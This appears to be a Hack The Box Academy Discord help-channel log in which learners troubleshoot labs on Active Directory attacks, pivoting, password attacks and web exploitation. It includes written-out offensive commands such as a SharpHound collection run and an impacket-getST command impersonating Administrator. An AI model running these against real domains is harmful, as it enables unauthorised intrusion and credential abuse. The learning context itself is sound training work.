MATCH (u:User)
WHERE u.hasspn=true
RETURN u
LIMIT 100

and it got me the 13 users as a result, which is what the answer was in HTB's academy.

#

So yeah Ig everything's running good.

static plinth
hasty mauve
#

Yes, same command

.\SharpHound.exe -c All --zipfilename htb
#

--version flag confirms it's 2.7.1

static plinth
hasty mauve
drowsy sleet
#

how can i start with hacking

compact patrolBOT
mossy crystal
#

I'm stuck on the Skills Assessment - Password Attacks challenge.
So far, I got the username and managed to log in via SSH. From there, I was able to ping a Windows host.
I tried tunneling with proxychains and saw open ports like SMB, WinRM, and RDP. I also found two usernames and attempted password spraying against these services, but the password doesn’t seem to work on SMB or WinRM.

Any idea what I might be missing, or could you drop a hint?

polar widget
#

somebody give it a read and lemme know

polar widget
#

aah, that makes sense, no worries

terse bloom
#

And it was not about PowerShell running as admin, I think that is an issue with the box. Interestingly enough, after some time I was in fact able to see 12 users (bloodhound is not showing krbtgt user apparently anymore). If you have previous AD knowledge, you would logically deduce that there is always in all domains a default krbtgt account. But this section didn't teach that, so...

terse bloom
mossy crystal
terse bloom
ancient niche
#

Good Afternoon guys I need help with the module Ai pls

#

the last skills assessment

void badger
ancient niche
void badger
#

Good luck!

acoustic owl
ancient niche
#

Tomorrow i'll try now i'm so tired 🙁 thanks

#

After trying many times I've been doing this for 7 months

#

thank so much bro

vapid maple
scarlet dock
#

hi
somebody completed the module Password Cracking ?

vapid maple
#

thanks, just worried may need the tool for CPTS and just wondering why I cant get it to work

wheat silo
#

Hey is anyone able to help me with the AD enumeration and attacks skills assessment part 2. I'm at the part where I'm trying to get the flag in the admin desktop on MS01 I've tried getting the Administrator NTLM hash with mimikatz but I haven't been able to pass the hash with it. The hint says enumeration is an iterative process but when I load PowerView on the meterpreter session I have on SQL01 it says the commands aren't recognized as cmdlets

static scaffold
#

Hello, I'm having trouble answering the 3rd question in Understanding Log Sources & Investigating with Splunk

#

Every method I attemp, I get the same wrong answer. The hint isn't getting me any closer.

Navigate to http://[Target IP]:8000, open the "Search & Reporting" application, and find through an SPL search against all 4624 events the account name that made the most login attempts within a span of 10 minutes. Enter it as your answer.

molten swallow
#

Guys , hello! I wanted to ask which vpn are you using - tcp or udp one? And how often are you regenerating the .ovpn file? I've got stuck at the DNS Footprinting. With a absolutely correct zone transfer command it gave me the absolutely wrong flag in format of ZONE_TRANSFER{bullshit}. Not the HTB{}. Switched from tcp vpn to the udp - and everything worked fine.

gray yacht
lime cosmos
#

i have problem in Visualizing Trust Relationships in BloodHound

dire cloak
deep mica
#

hey im a beginner and I kinda need help with this step on the box

#

I downloaded the monitor.sh file onto the shell and every time I try to run it I get this output

#

nevermind I cant post pics but I get this code. Input: "sudo /home/nibbler/personal/stuff/monitor.sh"
output: "'unknown': I need something more specific.
/home/nibbler/personal/stuff/monitor.sh: 26: /home/nibbler/personal/stuff/monitor.sh: [[: not found
/home/nibbler/personal/stuff/monitor.sh: 36: /home/nibbler/personal/stuff/monitor.sh: [[: not found
/home/nibbler/personal/stuff/monitor.sh: 43: /home/nibbler/personal/stuff/monitor.sh: [[: not found
"

static scaffold
fathom pendant
deep mica
fathom pendant
#

Then you likely messed up a step somewhere

deep mica
fathom pendant
#

Yes, the command should still reach you

deep mica
#

thanks for the help

wheat silo
fathom pendant
gray yacht
rustic sage
#

hi im having issues with the metasploit framework, module "modules"

#

i'm using the correct exploit but it doesn't seem to be working

#

it just won't connect to the RHOST

#

when i search show options

#

there's not IP next to RHOST

#

but i'm using the correct target IP

#

and the correct exploit

#

and its my correct vpn ip

#

so i have no idea why it wouldnt work

#

foun dit

#

set works, but setg doesn't for whatever reason

teal arrow
#

was anyone able to get Openvas to work? I can't donwload it on my kali machine.

long kestrel
#
sudo apt-get update && apt-get -y full-upgrade

sudo apt-get install gvm && openvas

gvm-setup

gvm-start
teal arrow
#

I keep getting errors when doing the gvm check-setup

long kestrel
#

I ran that on the pwnbox in the module about it

#

rather than doing it on my VM

teal arrow
trail anvil
#

hey every one.....im Jax, mostly a noob in HTB....i was trying to read a file with wire-shark but it keeps saying I'm not permitted to use it....or update stuff...no wonder im stuck in nood😅

#

any ideas....

cloud urchin
#

Try sudo

peak topaz
#

Yo guys i have prob. Im on a box and im on win-rm i run Import-Module .\SharpHound.ps1 and then have been running commands w/ valid creds and nothing back. I know i can run nxc and bloodhound-ce-python but ive heard the ingestors from specterops are better. Been trying hella combos and nothing.

Invoke-Bloodhound -LDAPUser 'xxx' -LDAPPass 'xxx' -CollectionMethod All -Domain htb.local

#

also tried same w/ exe as ewll

#

as well

#

last thing is the nxc bloodhound remote dump just as good as sharphound.exe ran on the machine itself

drifting torrent
#

two questions asking for flags from nmap scan, i only found one. second one's hint saying flag is from web server, but i dont know what script to use. please assist

#

nvm, i found answer..

mental canopy
peak topaz
#

ok bet ill lyk tmr the nxc actually uses ldap so i just used that. but i still got the lab open so ill lyk tmr. Locked in w/ python rn lol don't feel like spinning up winrm again.

stuck hollow
#

report module, section reporting, how to write up a finding is working horrible... always disconnecting, cant do anything

cloud urchin
#
  1. Make sure you don't use the pwnbox and VM at the same time. 2) Try another server or region
lime horizon
#

Android Fundamentals - Android Emulators
Create an AVD for 'Pixel 3a API 34 Google APIs' using Android Studio. What is the build number of the device? (Format: build_number, Example: build_number-test)

i was entering the right build number but it showing wrong.

little terrace
#

when doing pass the hash, how do i know if i should use psexec smbexec wmiexec and so on? what am i suppose to enum to know

cloud urchin
#

You won't know til you try or enumerate the permissions

#

the hash doesn't really matter, what matters is if the account has permissions to run psexec, smbexec, wmiexec, etc

unborn cobalt
#

suppose we have VPN access into company internal network then how we will perform certain attacks such as LLMNR/NBT-NS Poisoning as it is happening in layer 2?

steep quarry
#

Hello, who is good at hacking?

cloud urchin
hot cedar
#

It’s quite annoying to be looking at a seemingly simple flag asking about the os a box is running, looking at it in nmap output and it doesn’t seem to be an acceptable flag. I’ve tried multiple kernel versions and the hint just tells me what I already know

hot cedar
#

Yep

cloud urchin
#

Best to ask for help in #boxes then, you'll need to follow the instructions in #welcome to gain access.

lost pewter
#

Hello guys I would like to know if I subscribe to vip ? Do I get to access the vulnlab machine or note

lost pewter
kindred yacht
#

Stack-Based Buffer Overflows on Linux x86 - Take Control of EIP

#

Examine the registers and submit the address of EBP as the answer.

#

I don't really know what the question is asking for

#

I tried submitting the offset of EBP and the value of the register itself after segmentation fault but both are not the answer

smoky whale
#

Lol

kindred yacht
#

my bad

#

i did not read carefully enough

#

solved it

inner wadi
#

Hi, can anyone help me with Introduction to Windows Evasion Techniques SA2?

hasty lagoon
#

Hi everyone, I’m working on the Introduction to NoSQL Injection Skills Assessment II and have hit a bit of a roadblock. I’ve already identified a valid username and successfully triggered the reset functionality. However, when I try to use a time-based injection to enumerate the reset token, it doesn’t seem to work.

Any hints or guidance would be greatly appreciated!

mossy crystal
#

ERRCONNECT_CONNECT_TRANSPORT_FAILED [0x0002000D] – FreeRDP can reach the host, but the Kerberos authentication fails because no KDC for realm NEXURA.HTB is found. any ideas how i can fix this i am trying to connect with internal ip via proxychains

unique dune
#

Identifying SSRF

hardy elk
hardy elk
mossy crystal
hardy elk
hardy elk
#

yes and some windows error while changing files perm

mossy crystal
#

if maybe try remmina

hardy elk
#

yes but yesterday the tool was perfectly working

hardy elk
hardy elk
mossy crystal
hardy elk
quartz sundial
#

Hello! I need some help understanding the RBCD attack using an existing user (the last chapter in the module https://academy.hackthebox.com/module/25/section/833
).

First, I requested a TGT for the user carole.holmes.

Then I extracted the Ticket Session Key.

After that, I changed the password (the password hash) for the account carole.holmes to match the hash from the Ticket Session Key.

Next, I tried to get a service ticket:

||```
export KRB5CCNAME=carole.holmes.ccache
impacket-getST -u2u -impersonate Administrator -spn cifs/DC01.INLANEFREIGHT.LOCAL -no-pass INLANEFREIGHT.LOCAL/carole.holmes -dc-ip 10.129.205.35


But I get this error:

[] Impersonating Administrator
[
] Requesting S4U2self+U2U
[*] Requesting S4U2Proxy
[-] Kerberos SessionError: KDC_ERR_BADOPTION (KDC cannot accommodate requested option)
[-] Probably SPN is not allowed to delegate by user carole.holmes or initial TGT not forwardable


where am i wrong?
quartz sundial
#

anybody ?

rose forge
#

Hi guys wassup

void hemlock
#

can I speak to someone for this module? I'm having some technical issues
Windows Kernel Telemetry & Detection Techniques

autumn pilot
#

what kind of technical issues are you experiencing

silver sphinx
#

Ha jarvis0xq recheck ur commands

void hemlock
autumn pilot
#

did you enable the debugging output

#

or feel free to dm me

void hemlock
mossy crystal
silent scaffold
#

hello, is there a CPTS Prerequisites path like the SOC Analyst Prerequisites path ?

acoustic owl
quartz sundial
orchid scaffold
#

im in windows command line module and im stuck with the qn

#

why isnt this the answer

#

its skills assestment last qn

quartz sundial
river grove
autumn pilot
radiant stirrup
#

Does anyone else have issues with their boxes? Mine keeps on crashing and then can't ping it anymore.

quartz sundial
harsh gorge
gray yacht
quartz sundial
harsh gorge
#

Can you run it with debug as well

#

I think I might know the problem

#

@quartz sundial

quartz sundial
orchid scaffold
harsh gorge
#

You need to add it to the trust list I believe using rbcd.py

#

@quartz sundial

gray yacht
harsh gorge
#

such that DC01 is delegating TO and your created computer account is delegating FROM

#

You seem to have skipped a step

quartz sundial
quartz sundial
harsh gorge
#

hit me up @quartz sundial

quartz sundial
#

maybe we had a misunderstanding)) I was able to perform a classic attack from the module https://academy.hackthebox.com/module/25/section/833, creating a fake computer and as a result I compromised the domain. now, I am trying to perform an attack in a different way, without creating a fake computer, the attack described in the block "RBCD from Linux When MachineAccountQuota Is Set to 0"

quartz sundial
harsh gorge
gray yacht
quartz sundial
# gray yacht Send me a DM when you are able.

thanks @gray yacht !!

turns out i should have used beth.richards but i thought i should have used carole.holmes, since it was this user that was suggested to be used at the end of the module

tiny cave
#

hi, i am on the module Advanced Deserialization Attacks: Debugging .NET Applications

i am trying to setup an IIS locally (Windows 11) by following the instructions provided. However, my IIS manager does not have the option to add sites.

i have ran IIS manager as administrator + i have no 3rd party antivirus installed - anyone know a fix for this?>

quartz sundial
acoustic owl
torpid inlet
#

Hi, I’m currently going through the LLM Output Attacks module and have been stuck on the Function Calling technique for the past two days. I would really appreciate any guidance or pointers to help me move forward. I’m new here, so apologies in advance if I’ve phrased anything incorrectly.

severe eagle
#

Hey on attacking thief client applications looking for hidden cred in restart.oracle service

#

Im VPNing from Australia and this is a joke I keep getting dc unless I use there online machine coming from around its just to slow 😞 has anyone else had this why cant we be give file and just do on own machine this is stupid

#

If anyone could help please reach out this is pritty dumb trying to do 500 to 700 ms

#

And thats on there parrot box before rdp to the next machine 😅

#

Yeah this was ridiculous on tryhackme done same some modules gives the program to run through a vpn then rdp then run debuggers on some 2gb ram vm just stupid has anyone done this module and yous dm me please

eternal crystal
#

hello i just completed the skill assessment - easy of the attacking common services module. I got the flag by compromising the sql service. I think there was another way to get the flag as hinted. can anyone help me with this?

abstract talon
#

hey guys im trying to do the mcos fundamentals... what mcos device am i supposed to use to answer the questions?

rustic sage
heavy mango
#

<@&861185840277487616>

last bronze
#

Hii I am facing some issue here . Can Anyone tell how to solve.
Add an instruction to the end of the attached code to "xor" "rbx" with "15". What is the hex value of 'rbx' at the end?

this is the attached code :
global _start

section .text
_start:
xor rax, rax
xor rbx, rbx
add rbx, 15

magic timber
#

Hello, i'm stuck on a part of the module "Wi-Fi Password Cracking Techniques" in the hybrid mode, im supposed to crack a password with a wordlist and 4digits number following it, im sure that im doing the good thing, but after 10min it still didn't get crack, so idk if im not using the rightwordlist, or doing a bad command

tough ibex
#

I think the /opt/wordlist.txt + wordlist be enough

magic timber
tough ibex
#

on the HTB machine ?

magic timber
#

yes

tough ibex
#

I did it on my own host, HTB machines are slow to crack

#

if you can access a GPU even better

magic timber
#

idk, already 13%

tough ibex
#

show me your mask

magic timber
#

can i dm you?

tough ibex
fathom pendant
#

Have you tried doing what the section told you.

#

No idea what you mean

fathom pendant
#

^

#

Well thats not the question, nginx is the web framework, WordPress is a content management system

#

I suggest utilizing a search engine for that 😉

vapid maple
#

add the --no-update at the end

fathom pendant
#

https

#

Use http instead

quiet halo
#

anybody know this?

vapid maple
#

thats the only way I ve got wpscan to work

fathom pendant
quiet halo
fathom pendant
#

You mean footprinting?

quiet halo
#

oh yeah

final kite
#

anyone doing password attacks skill assesment ?

hollow ermine
#

Someone can help me with module intro to c2? im stuck

pallid pilot
#

Hello can someone help me with Intro to Deserialization attacks SA 2

abstract talon
#

someone here know you're supposed to use a macos deivce in the OS Fundamentals module?

#

Find the numeric version running on your machine and submit it as the answer. -> what does that mean? what is my machine?

cloud urchin
#

It is recommended to have your own MacOS to use

abstract talon
#

but is the answere not predetermined? or can you submit whatever?

#

also i dont have a MacOS

cloud urchin
#

idk I didn't do the module

#

I believe it can be done without it, but it's recommended to have your own MacOS to complete it

abstract talon
#

usually if they ask what is your version number they mean from the pwnbox your using or the target

#

but they dont provide anything in that section

#

im just gonna try submiting a random version and see if its gonna accept it

#

alright it accepted a random one i put, ill just move on

final kite
#

can someone give me nudge
on password attacksi, i got into internal network and pivvoted traffic but cant access and of 3 machines

gray yacht
gray yacht
final kite
gray yacht
gray yacht
final kite
#

i already setup ligolo pivoting and checked all ports etc.

#

i guess i am missing credentials that i should ve found on pivot host ?

#

but i wouldnt guess thats the way

gray yacht
final kite
#

aha i got it i think

#

found it

#

checked it before just didnt really look properly

mild python
#

If you're stuck on Task 1 of the Skills Assessment:

Once you have your loop and you want to find the shellcode, remember that there are 14 pieces, and they are all stored on the stack (rsp). Review the 14 pieces as indicated in the "Debugging with GDB" module, using the hex format (x) and the giant (g) size of 8 bytes. If you use a different size, you must reverse the hexadecimal values because of little-endian.

tiny cave
pallid pilot
#

Hello, i am doing the intro to deserialization attacks SA2 but now im stuck with the RCE part, i achieve a ping by the page functionality but the nc doest work, any hints?

pallid pilot
#

Plz someone help me

full echo
lime horizon
full echo
pallid pilot
untold wolf
#

Can I DM anyone on Intro to Whitebox Pentesting Exploit Development?

rose forge
#

Do you guys have discussions here wherein you talk about anything under the sun

cloud urchin
#

That's in #general. You'll need to verify your htb account by following the instructions in #welcome.

rose forge
#

I cannot chat in general I do not have any htb account

cloud urchin
#

Then you'll need to make one if you want to access most of the server.

rose forge
#

Is this like an official htb server ?

cloud urchin
#

yes

rose forge
#

Do you guys do vc

cloud urchin
#

Yes there are voice channels

brisk kestrel
#

Yall question

native carbon
#

Hey guys how do y'all take notes and actually retain the info long-term? I've been getting stuck with learning everyday but never retaining the info and ik note taking helps with that.

native carbon
#

yea lol I was watchin that a few hours ago just wanted to ask here to see how other ppl do note taking

fathom pendant
woven zenith
#

super noob question, I'm not following.. what does STMIP means?

cloud urchin
#

Is that from the solution? I think it's just the target IP.

fathom pendant
wanton spindle
#

Quick question, why does it say incorrect task flag even if it's correct? I'm on tier one 🙁 and i can't proceed.

fathom pendant
uncut nymph
#

for some reason it isnt accepting the flag. tried checking for whitespace and manually typing it in, still gives me invalid answer. is there a chance that this could be a glitch that needs someone from HTB to look into?

fathom pendant
uncut nymph
#

oh ... that's intersting. will rerun my scans. thank you

fathom pendant
#

that's the flag for a different service/section

#

a fair bit of sections in some modules will reuse the same lab (within the same module) with multiple services to enumerate/interact with throughout the module

uncut nymph
#

found the flag! Thank you so much

little terrace
#

is it necessary to learn chisel + proxychain? im seeing the discord chat history and many recommend ligolo-ng

brazen saffron
#

ligolo-ng is very simple to use, but personally with chisel I don't use proxychains, ligolo-ng acts as a kind of VPN to simplify things.

little terrace
#

is proxychains and chisel a either/or thing? or must it both be used together?
at least thats what im seeing in the password attack module

storm elk
#

Sometimes one will work better than the other

tiny cave
worldly heron
acoustic owl
brazen saffron
orchid scaffold
#

hey i need help with bash scripting module can i dm anyone?

#

intro to bash scripting

tiny cave
acoustic owl
quartz sundial
#

Am I the only one whose virtual machine in the module freezes periodically? I rebooted it several times. It stops pinging for a while, then it pings again

junior fjord
#

Hey one doubt :- into the password attacks module ! The only way to gain nexura administrator password is performing DC**nc attack on domain with the user *tom

But the irony is if any new commer come and try to do this skill assessment blind he/she don't much able to do because AD attacks modules are way after this password attacks module

#

So my real concern is:- there is also another way except DCnc attack, to do domain compromise ? Like DCnc is not teached in password attack module 😕 BUT SKILL ASSESSMENTS NEED TO DONE WITH THAT.....

river grove
fathom pendant
drifting dirge
# winged elm how did you identify where the problem was?

Did a little print debugging in Ruby code 😀 After adding couple of debugging statements in request handling method and notices nothing was printed, therefore it wasn't called, therefore something might have changed in base classes or mixins.

edgy schooner
#

Maybe irrelevant now, but for anyone else stuck on this: try a Python HTTP server to transfer...

obtuse wasp
#

Hey everyone, I'm a second-year computer science student at university, and I recently started the HTB JCA certification. Although I'm comfortable with the shell, I'm stuck trying to find the right solutions for kernel release (I only got 2 numbers), and the name of network interface (I had 2 but they're wrong)... So anyone could give me some advice, that would be kind. Thanks

fathom pendant
obtuse wasp
#

Thanks a lot, I'll try once at home, I'm stuck with others things while I'm succeeding in more difficult modules that require a greater level of understanding

orchid scaffold
#

hello im doing intro to bash scripting module and im stuck with question

civic inlet
#

Hey guys anybody doing DACL attacks II? Was wondering how you guys did the SPN Jacking exercise

hasty mauve
#

kali

small hound
#

Hi

full ledge
limber fog
#

Hello !
In the Attacking Common Applications - Attacking ColdFusion, I had to modify the CVE payload, as msfvenom didn't work from the python script.
I generated the shell on the side, then edited the code to remove the name of the shell to the name of my choice.
I am currently running the exploit. It was mentioned that it takes time, but how much time are we talking about ? It's been like 5' and that seems a bit much

EDIT + how it worked : Still haven't found out. It was stuck waiting for the response of the first request. However stopping the script & checking the uplaod directory manually shows that the shell has been uploaded. I received the shell by stopping the .py script and running a listener manually + triggering the shell by clicking on it from the web interface

wide path
#

Hi, I did a Notion template which I used for the Attacking Enterprise Network module and it really helped me to gather information and see attack paths I did not think of during the assessment. I decided to build this template for people doing the same module, CPTS or even pro labs, don’t hesitate to dm me to give me feedbacks 🙂

https://www.notion.so/fr/templates/cpts-oscp-prolabs-notes

Notion

A note-taking template to help you organize your notes and findings while doing pentest assessments on HackTheBox Prolabs, certifications (CPTS, CAPE, OSCP) and similar tasks. | Découvrez de nouvelles façons d’utiliser Notion dans votre vie personnelle comme professionnelle.

hallow dome
haughty valve
#

I've just started on the platform. I like it 😊

severe eagle
#

Hey guys the attacking common applications i cant ftp the fatty-client.jar to even attempt on my own pc can anyone help with this please

#

There servers just no good for this

#

Vpn to then rdp to then do analysis of file

#

Anyone out there can help?

brave field
severe eagle
#

Tried share with smb xfreerdp

#

Try remains too just keeps reconnecting this is stupid

fallow gazelle
#

Guys i'm stuck on HTB when we have to use curl to download a php file from inlanefreight.com

severe eagle
#

Remove the -O

fallow gazelle
#

Isn't the O needed for downloading?

severe eagle
#

Yeah at the end

#

-O then file output pritty sure

fallow gazelle
#

Have u done this module?

#

Its tier 0

severe eagle
#

Yeah it is -O then output file

#

Na but I use curl alot

#

You dont put -O at the front

fallow gazelle
#

Where do i put it?

severe eagle
fallow gazelle
#

Where does the /download.php go?

severe eagle
#

Current dir

#

Type pad in terminal thats where be

fallow gazelle
#

Have u done this module before?

#

None of that worked dude

severe eagle
#

Work for ya?

fallow gazelle
#

Nope

severe eagle
#

Didnt work

#

Dm me

#

-o

#

Lowercase

limber fog
digital crater
#

Has anyone solved the RCE in the blind SQL injection module for CWEE (module/177/section/1765)? I see a couple people had the same issue before but they didnt get any response. I have the same issue where nc.exe gets downloaded but the reverse shell doesn't get through. Are we supposed to use an alternate method?
I ended up figuring it out, but I highly doubt this was the intended way as I had to know an internal path on the server (which I did get through luck).

fallow gazelle
#

It says server permanently moved to https or something

severe eagle
fallow gazelle
#

It says document has moved https:inlanefreight.com/download.php

#

But that doesn't give anything either really

#

So...

dull solar
#

Http not https?

severe eagle
#

Im not sure i do that command it downloads and if its a htb server be http not https

#

And "pwd" gives me directory its saved in

fallow gazelle
#

I tried both http and https

native carbon
severe eagle
#

Its not for me

limber fog
#

Indeed my bad x)

severe eagle
#

For zZeez

limber fog
severe eagle
#

Lol i got no idea and could be not being in /etc/hosts

#

Im on fatty-client server finally downloaded trying to get Java 8 going now to run it hahaha

fallow gazelle
severe eagle
#

Just need IP for it for exploiting web vulnerability in thick client applications u done this module?

digital crater
fallow gazelle
#

Thankyou guys for your help, someone helped me figure it out

scarlet dock
#

hi guys
i'm at the skills assesment in password attack
i found the root password but with the user 'Administrator' i cant access

i tried rdp,ssh,ldap,winrm but nothing
hints ?

gray yacht
scarlet dock
#

okay
thank you !

little terrace
#

with chisel and proxychains i should be able to run things like whoami and pinging internal machines right?

been trying to chisel from the dmz and its connected but not running the commands

cloud urchin
#

Chisel and proxychains just route your traffic to the internal network. It can give you access to an internal machine where you can run commands.

sage void
#

Anyone know how to write the file types you want with the -x command using snaffler in the hunting network shares module

#

I’m getting errors everytime and I’ve tried 3 different types of ways to type them

fathom pendant
#

maybe? if you paid for any cubes that restriction is lifted. but it's generally best to set up your own vm ¯_(ツ)_/¯

silent scaffold
#

hello , could someone explain me why we have to replace PAGE_URL by STMIP:STMOP and the meaning of STMIP:STMPO. My understanding is STM (IP for ip address) and PO (for port) ? in the module "introduction to python3" -thank

hallow dome
# brave field Congrats! Some tips for everyone?

I see many tips from other reviewers, and they are all quite true. Especially, sticking to the module material and doing some extra labs will be helpful.

From my perspective, the most difficult part is choosing the correct materials to complete the task. Sometimes it won’t work the first time, even if you choose the right material. In those cases, it helps to take a break, review your steps, or even headbutt a pillow sometime help.

These are my some advises.

opaque cosmos
#

i am doing Detecting Windows Attacks with Splunk module at the section of Leveraging Zeek Logs question unable to connect to the ip port splunk please help

golden prawn
#

Has anyone here done the new HTB academy password attacks module?

hot lodge
#

been a while but what do you need help with?

golden prawn
#

I'm lost on what I need to do after I'm in the Jump machine

#

when I'm RDP'd onto it

hot lodge
#

which section is it

golden prawn
hot lodge
#

try use pypykatz to extract hashes and passwords from our lsass.dump

gray yacht
# opaque cosmos help

Are you supposed to use https to access Splunk? I haven't done that module, but that is generally the issue with accessing Splunk within the CPTS path.

opaque cosmos
#

CDSA path

gray yacht
# opaque cosmos CDSA path

Right, I'm saying I have not done what you are working on, but for those that are doing the CPTS path and encounter Splunk and have issues getting to the search head, they generally are trying through http instead of using https

opaque cosmos
#

the module Detecting Windows Attacks with Splunk has 2 parts Leveraging Windows Event Logs and Leveraging Zeek Logs in Leveraging Zeek Logs the by ip and port i am unable to access splunk

opaque cosmos
#

it was using http

golden prawn
fierce marten
#

hey , I have little problem about the ffuf module the filtring section, I get no VHosts in the scan

abstract talon
#

I used to use the forum in discord, but i can't find it anymore. Can somebody help me? Feeling stupid right now lol

solar cedar
#

guys how do i achieve talking status in like general chat sorry

gray yacht
solar cedar
#

tytyt

gray yacht
fierce marten
#

mb

woven storm
#

Hello, I am Stuck at 2FA part of Skill Assessment of Broken Authentication module

green shuttle
#

hi i am at the privilege escalation part in AEN module and i can't make it to mgmt if anyone could help i would appreciate that

grizzled schooner
#

We can't help sorry - this is for HTB Academy only

#

Looking for help with ACL Enumeration

Working through "Using the skills learned in this section, enumerate the ActiveDirectoryRights that the user forend has over the user dpayne (Dagmar Payne)"

Ran BloodHound - the GUI doesn't recognize "forend" as a user? please @ with responses

sacred ermine
#

genuine question, has anybody used this tool Adalanche over BH?

#

like in real-engagement and probably some lab ?

golden prawn
#

Anyone help with the password attacks final assessment

jade frigate
#

Just sharing some info if anyone got stuck like I have at the /module/147/section1335 (pass-the-certificate):

  • read every single character while referencing / searching for codes. Seriously.
  • it's better if you go step-by-step with the cheatsheet/show solution in my opinion than the section's info, BUT you gotta execute the 'ntlmrelayx' attack first, and the 'show solution' button won't demonstrate that in the FIRST question.
  • the second question it's tricky because it can overlap with the certificate you've already got from the previous question, so make sure to really execute the step-by-step all over again, for real!

After almost 2 days stuck I finally understood the section. prayge

late bough
#

I am on https://academy.hackthebox.com/module/289/section/3246 doing the last part and So, to calculate the port number, we will use the last two numbers shown (in the example above, they are 194 and 40). We will take the first number and multiply it by 256, then add the second number. which for me is (10,129,233,197,194,13). so 194 * 256 + 13 = 49677 but when I did the next step it says
10.129.233.197: inverse host lookup failed: Unknown host
(UNKNOWN) [10.129.233.197] 49677 (?) : Connection refused
which is odd because I checked my math and it is right

bright pivot
hearty wasp
#

Hello, if I have a bug in one of the module's tasks, where should I address it?

somber whale
#

I have a question: I am not trying to be in cybersecurity. I enjoy learning. If I just solely went through the modules only. Is that enough to be able to learn how to complete CTF type modules? Or the learning modules are not enough and will still need to learn nice that info?

final kite
#

did anyone have connection problem

#

with AD modules

terse sedge
#

I'm in Password Attacks, Pass the Ticket (PtT) from Linux, Question 7. I'm trying to import julio's ccache file with kinit, but get errors when trying: Pre-authentication failed: "Unsupported key table format version number while getting initial credentials" or "Pre-authentication failed: Permission denied while getting initial credentials". Any idea what I'm doing wrong?

hearty wasp
#

for real guys, where can we get some support here?

wide wigeon
#

Hey, sorry if unrelated but I don't have permission to chat in an of the HTB Off topic channels, except bot commands. How can i get access?

gray yacht
gray yacht
gray yacht
gray yacht
#

This content is from a module that is over Tier 0, so I am going to delete it.

gray yacht
gray yacht
languid coral
#

Windows Privilege Escalation - Kernel Exploits. I was following the steps of the CVE-2020-0668 exploitation and got the meterpreter session but the moment the error popped up on the target machine it stopped responding. This makes sense in principle: windows can't launch service, shuts down the executable. From here there's migrating to a different process or launching a different payload with admin rights, so that's not an issue either. But the tutorial suggests that the meterpreter session stays connected and stable, so I guess I messed something up. Any ideas?

bright belfry
#

I’m doing a module under the Silver subscription, and I’m trying to “Start Instance” and it tells me there’s an error. Am I supposed to have unlimited access to start up instances? Should I reach out to tech support, or someone that can help with this?

cloud urchin
#

Try CTRL+SHIFT+R

lime horizon
#

i figured it out. i installed google play apis instead of google apis. thats what i messed up

tiny moth
#

Wi-Fi Evil Twin Attacks - Skills Assessment #3: I can't find any connected clients or get any to try to connect to the rogue AP with eaphammer. What am I missing?

gloomy kelp
#

what should i start learning guys i wanna be a hacker like yall

compact patrolBOT
gloomy kelp
#

thankyou mr "supernuts"\

upper widget
#

i need help with this
Use Burp Intruder to fuzz for '.html' files under the /admin directory, to find a file containing the flag.
i found index.html under admin directory but i dont know how to find the flag

ocean night
upper widget
#

burp intruder

storm elk
#

let me see 🙂 give me a minute

#

Dm me everything you tried @upper widget 🙂 as its a module above tier 0 , we should take it to dm

stuck hollow
#

enyone know what is this error? module Attacking Enterprise Networks section exploit. and privesc

#

sharphound isnt working

storm elk
#

Maybe its a double hop problem?

stuck hollow
little terrace
#

im doing password attack skills assessment

my proxychains nmap scans of a machine do not indicate port 445 open but somehow proxychains nxc smb shows a valid credential to log in through 445. how..?

hallow dome
# brave field you mean prolabs?

In my case, I didn’t do any ProLabs, but I hear it is a good resources. I just followed Unofficial CPTS by IppSec and practiced on some Windows machines. The most important thing I gained from doing extra labs is that they helped me understand the tools’ output better, which isn’t fully covered in the modules.

river grove
bright belfry
wooden halo
#

Module Name: Command Injection
Section Name: Exploitation - Other Injection Operators

Try using the remaining three injection operators (new-line, &, |), and see how each works and how the output differs. Which of them only shows the output of the injected command?

I intercepted the request in burp, tried the above injection operators. The injection accepts "&" operator. But the webpage is not accepting this as answer. I tried the encoding of & but still it didn't work.

soft hornet
#

In the future, as many teachers as possible should be able to interact with ChatGOD simultaneously. Each individual connection from a ChatGOD server to a teacher’s PC requires a bandwidth of 5,982,126 bit/s. The ChatGOD server has a symmetric Internet connection with a speed of 1 GByte/s. The teachers’ Internet connections have a download speed of 100 MByte/s and an upload speed of 20 MByte/s.

Question: How many teachers can interact with the ChatGOD server simultaneously without overloading the connection?

#

Is the answer 1337 or 26?

storm elk
#

what module is this lol

soft hornet
#

Networking

#

I think the bottleneck should be the shared link between all of them right? We don’t care about their individual download upload speed?

waxen totem
soft hornet
#

No

waxen totem
brazen nacelle
#

https://academy.hackthebox.com/module/255/section/2916
Hi, I have a question about the module "DACL Attacks II" in section "sAMAccountName Spoofing". In the content there ist this code:
getTGT.py inlanefreight.local/dc03:Hacker0039 -dc-ip 10.129.229.224
Where does the password "Hacker0039" come from? It wasn't given during the module.

loud raven
#

👍

rustic sage
quiet halo
#

"The $ in SMB/CIFS URIs means that the share is hidden, and won't be displayed when browsing shared folders"

#

so why can I view the share names when running smbclient -N -L //10.129.34.168

fathom pendant
#

Because that's only when talking about windows interactions

quiet halo
#

oh ok so it dosnet apply to linux systems

river grove
#

you can dm me

wet willow
#

Yo

frail dagger
#

Hello guys I am new to hacking anyone know how to find Vulnerability and how to make a boy net if yes dm me

#

Or just reply here

#

@here

fathom pendant
compact patrolBOT
fathom pendant
livid kayak
#

Hi all. I am at the logrotate section of the Linux Privilege Escalation CPTS module and managed to trigger log rotation and get the flag with logrotten. I am still "stuck" however, as I don't really understand the why of why it worked, and I always make it a priority to not walk away from a section if I can't answer that question. If anyone who does has some free time, would you mind reaching out to me via DM to have a conversation? Thank you! 🙂

fathom pendant
#

Its a race condition

rich hornet
#

i'm doing the Shells & Payloads skill assessment. I need to visit the website for the first host but there is no browser available on the foothold... There is only tor but we need to install it and we have no access to internet

#

do you have an idea ? (we can't visit the website from the pwnbox because its not in the same vlan)

autumn pilot
#

You can start the browser through the terminal

rich hornet
#

Oh yeah you're right

#

ty !

civic inlet
#

Hello everyone I'm doing DACL Attacks II Skills assessment and I'm trying to use gettgtpkinit.py but I keep getting this error message

<SNIP>
i.py", line 44, in <module>
raise LibraryNotFoundError('Error detecting the version of libcrypto')
oscrypto.errors.LibraryNotFoundError: Error detecting the version of libcrypto

How on earth do I fix this? (I'm also using Pwnbox)

rustic sage
#

can someone teach me about Whitelist Filters on file uploads ? i'm stuck in here

gray yacht
gray yacht
rustic sage
#

Just stuck

gray yacht
opal nexus
#

hello everyone - do we know if there will be android pentesting certificate?

gloomy grail
#

Hello guys, I need help for client-side-prototype-pollution exercise.

